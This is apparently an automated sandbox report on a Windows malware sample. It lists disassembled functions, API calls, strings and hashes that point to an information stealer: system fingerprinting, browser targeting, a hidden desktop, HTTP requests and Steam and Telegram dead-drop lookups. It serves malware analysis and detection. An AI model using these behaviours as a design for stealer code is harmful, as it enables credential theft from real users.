                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                                                                                                                                                      • String ID: Stable\$chrome$firefox$opera
                                                                                                                                                                                                                                                                                      • API String ID: 3722407311-3146807071
                                                                                                                                                                                                                                                                                      • Opcode ID: 6706b4d3de68381de9acf2f3cf5a3500a8a77dcd0908f9563c4221972a14ca8e
                                                                                                                                                                                                                                                                                      • Instruction ID: 22bc5863ea798df5109445d1e364a8a74c8a3d857c00c7bd5e27f083e93039e9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6706b4d3de68381de9acf2f3cf5a3500a8a77dcd0908f9563c4221972a14ca8e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94429131D00B099BDB05EF75C981AEAB7B4FF18308F008159F9556B252EB38BAD5CB94
                                                                                                                                                                                                                                                                                      Function 00410540 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 133memorystringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                      • GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                      • String ID: %08lX%04lX%lu$:\$C
                                                                                                                                                                                                                                                                                      • API String ID: 1059865016-545181305
                                                                                                                                                                                                                                                                                      • Opcode ID: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                                      • Instruction ID: daccc5cf811b00eb36f485bb9bb5cfb034b4705064687d02f987ca2459062bbc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6141D4705083107BD301BB718C85BBF7AE99FC5784F00491EF58597291EBBC99829BAA
                                                                                                                                                                                                                                                                                      Function 00407110 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringsleepCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                                      • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
                                                                                                                                                                                                                                                                                      • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 004071BD
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?), ref: 0040725B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Desktop$CreateOpenSleeplstrcpymemcpystrlen
                                                                                                                                                                                                                                                                                      • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA
                                                                                                                                                                                                                                                                                      • API String ID: 3603158527-2020731023
                                                                                                                                                                                                                                                                                      • Opcode ID: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                                      • Instruction ID: f2f5d87aafaa2d86ed8620da2dc3468a3bb05fc034b5e9ecb920fc18406a804c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56313771D04344ABDB21EB218D41BEFB774AF95304F00419EF90832192DB786AC5CBAA
                                                                                                                                                                                                                                                                                      Function 00410B30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 33registrymemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00410B42
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410B50
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410B8E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • ProcessorNameString, xrefs: 00410B7C
                                                                                                                                                                                                                                                                                      • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00410B5E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                      • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                                                                                                                                                                                                                                      • API String ID: 3466090806-2804670039
                                                                                                                                                                                                                                                                                      • Opcode ID: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                                      • Instruction ID: 414338a11f3689f75f6fdb63b0f136fa5a8568cc8c95f28b9b39ab38a5685d7b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04F08230784320BBD3106B24AC0AF5A7A99AB45B51F504029F685A71E1D6A06C508BD5
                                                                                                                                                                                                                                                                                      Function 00416B40 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 258stringsleepCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000,0042150A,0042150A), ref: 00416C6A
                                                                                                                                                                                                                                                                                      • strstr.MSVCRT ref: 00416C82
                                                                                                                                                                                                                                                                                      • strstr.MSVCRT ref: 00416C94
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60,?,0042150A,00000000,0042150A,0042150A), ref: 00416DC7
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpylstrlenstrstr$Sleep
                                                                                                                                                                                                                                                                                      • String ID: ERROR$steamcommunity.com$t.me
                                                                                                                                                                                                                                                                                      • API String ID: 1105026832-5696879
                                                                                                                                                                                                                                                                                      • Opcode ID: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                                      • Instruction ID: d2cef3e00896b903973622f9bff644efbf55bb675c2f2304de14bb25205f25c7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CA1C131900619ABCF05EFA1C9958EEB775BF58308F00814AF8056B152EF7CAAD5CBD5
                                                                                                                                                                                                                                                                                      Function 004169C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: StrCmpCA.SHLWAPI(?,https), ref: 004042F4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00404360
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: InternetSetOptionA.WININET(00000000,0000001F,FFFFFFFF,00000004), ref: 00404387
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004043B3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,0042150A), ref: 00416A2B
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00416A46
                                                                                                                                                                                                                                                                                        • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,00000000), ref: 00416A6E
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00416A8F
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000001,?), ref: 00416AA6
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                                                      • String ID: ERROR
                                                                                                                                                                                                                                                                                      • API String ID: 4174444224-2861137601
                                                                                                                                                                                                                                                                                      • Opcode ID: 3da0e4c79ea6eeeea05f36d05e7dcc9dc094194869fc174e7ba2f01bb6edc5a2
                                                                                                                                                                                                                                                                                      • Instruction ID: 855039ff49ac9ec10de8df2a88766b452ea63e393e544b77beb2aca96e60e2a3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3da0e4c79ea6eeeea05f36d05e7dcc9dc094194869fc174e7ba2f01bb6edc5a2
